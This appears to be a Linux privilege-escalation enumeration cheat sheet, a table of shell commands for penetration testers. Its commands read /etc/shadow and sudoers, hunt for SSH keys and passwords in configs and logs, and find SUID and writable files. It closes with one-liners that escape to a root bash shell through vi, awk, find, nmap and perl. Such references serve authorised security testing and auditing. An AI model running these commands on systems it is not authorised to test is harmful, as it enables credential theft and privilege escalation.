linuxenumeration

1. Kernel, Operating System & Device Information:
2. Command     Result
3. uname -a    Print all available system information
4. uname -r    Kernel release
5. uname -n    System hostname
6. hostname    As above
7. uname -m    Linux kernel architecture (32 or 64 bit)
8. cat /proc/version   Kernel information
9. cat /etc/*-release  Distribution information
10. cat /etc/issue  As above
11. cat /proc/cpuinfo   CPU information
12. df -a   File system information
13.  
14.  
15.  
16. Users & Groups:
17. Command     Result
18. cat /etc/passwd     List all users on the system
19. cat /etc/group  List all groups on the system
20. for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null    List all uid’s and respective group memberships
21. cat /etc/shadow     Show user hashes – Privileged command
22. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'     List all super user accounts
23. finger  Users currently logged in
24. pinky   As above
25. users   As above
26. who -a  As above
27. w   Who is currently logged in and what they’re doing
28. last    Listing of last logged on users
29. lastlog     Information on when all users last logged in
30. lastlog –u %username%     Information on when the specified user last logged in
31. lastlog |grep -v "Never"    Entire list of previously logged on users
32.  
33.  
34.  
35. User & Privilege Information:
36. Command     Result
37. whoami  Current username
38. id  Current user information
39. cat /etc/sudoers    Who’s allowed to do what as root – Privileged command
40. sudo -l     Can the current user perform anything as root
41. sudo -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\
42. |'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\
43. |ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null  Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.
44.  
45.  
46.  
47. Environmental Information:
48. Command     Result
49. env     Display environmental variables
50. set     As above
51. echo $PATH  Path information
52. history     Displays command history of current user
53. pwd     Print working directory, i.e. ‘where am I’
54. cat /etc/profile    Display default system variables
55. cat /etc/shells     Display available shells
56.  
57.  
58.  
59. Interesting Files:
60. Command     Result
61. find / -perm -4000 -type f 2>/dev/null  Find SUID files
62. find / -uid 0 -perm -4000 -type f 2>/dev/null   Find SUID files owned by root
63. find / -perm -2000 -type f 2>/dev/null  Find GUID files
64. find / -perm -2 -type f 2>/dev/null     Find world-writeable files
65. find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null   Find world-writeable files excluding those in /proc
66. find / -perm -2 -type d 2>/dev/null     Find word-writeable directories
67. find /home –name *.rhosts -print 2>/dev/null  Find rhost config files
68. find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;     Find *.plan files, list permissions and cat the file contents
69. find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;     Find hosts.equiv, list permissions and cat the file contents
70. ls -ahlR /root/     See if you can access other user directories to find interesting files
71. cat ~/.bash_history     Show the current users’ command history
72. ls -la ~/.*_history     Show the current users’ various history files
73. ls -la /root/.*_history     Can we read root’s history files
74. ls -la ~/.ssh/  Check for interesting ssh files in the current users’ directory
75. find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la    Find SSH keys/host information
76. ls -la /usr/sbin/in.*   Check Configuration of inetd services
77. grep -l -i pass /var/log/*.log 2>/dev/null  Check log files for keywords (‘pass’ in this example) and show positive matches
78. find /var/log -type f -exec ls -la {} \; 2>/dev/null    List files in specified directory (/var/log)
79. find /var/log -name *.log -type f -exec ls -la {} \; 2>/dev/null    List .log files in specified directory (/var/log)
80. find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null  List .conf files in /etc (recursive 1 level)
81. ls -la /etc/*.conf  As above
82. find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null   Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located
83. lsof -i -n  List open files (output will depend on account privileges)
84. head /var/mail/root     Can we read roots mail
85.  
86.  
87.  
88. Service Information:
89. Command     Result
90. ps aux | grep root  View services running as root
91. ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'  Lookup process binary path and permissions
92. cat /etc/inetd.conf     List services managed by inetd
93. cat /etc/xinetd.conf    As above for xinetd
94. cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null    A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each
95. ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null   Permissions and contents of /etc/exports (NFS)
96.  
97.  
98.  
99. Jobs/Tasks:
100. Command     Result
101. crontab -l -u %username%    Display scheduled jobs for the specified user – Privileged command
102. ls -la /etc/cron*   Scheduled jobs overview (hourly, daily, monthly etc)
103. ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null   What can ‘others’ write in /etc/cron* directories
104. top     List of current tasks
105.  
106.  
107.  
108. Networking, Routing & Communications:
109. Command     Result
110. /sbin/ifconfig -a   List all network interfaces
111. cat /etc/network/interfaces     As above
112. arp -a  Display ARP communications
113. route   Display route information
114. cat /etc/resolv.conf    Show configured DNS sever addresses
115. netstat -antp   List all TCP sockets and related PIDs (-p Privileged command)
116. netstat -anup   List all UDP sockets and related PIDs (-p Privileged command)
117. iptables -L     List rules – Privileged command
118. cat /etc/services   View port numbers/services mappings
119.  
120.  
121.  
122. Programs Installed:
123. Command     Result
124. dpkg -l     Installed packages (Debian)
125. rpm -qa     Installed packages (Red Hat)
126. sudo -V     Sudo version – does an exploit exist?
127. httpd -v    Apache version
128. apache2 -v  As above
129. apache2ctl (or apachectl) -M    List loaded Apache modules
130. mysql --version     Installed MYSQL version details
131. psql -V     Installed Postgres version details
132. perl -v     Installed Perl version details
133. java -version   Installed Java version details
134. python --version    Installed Python version details
135. ruby -v     Installed Ruby version details
136. find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)   Locate ‘useful’ programs (netcat, wget etc)
137. which %program_name% (i.e. nc, netcat, wget, nmap etc)  As above
138. dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null   List available compilers
139. cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'
140.  
141.     Which account is Apache running as
142.  
143.  
144.  
145. Common Shell Escape Sequences:
146. Command     Program(s)
147. :!bash  vi, vim
148. :set shell=/bin/bash:shell  vi, vim
149. !bash   man, more, less
150. find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;  find
151. awk 'BEGIN {system("/bin/bash")}'   awk
152. --interactive   nmap
153. perl -e 'exec "/bin/bash";'     Perl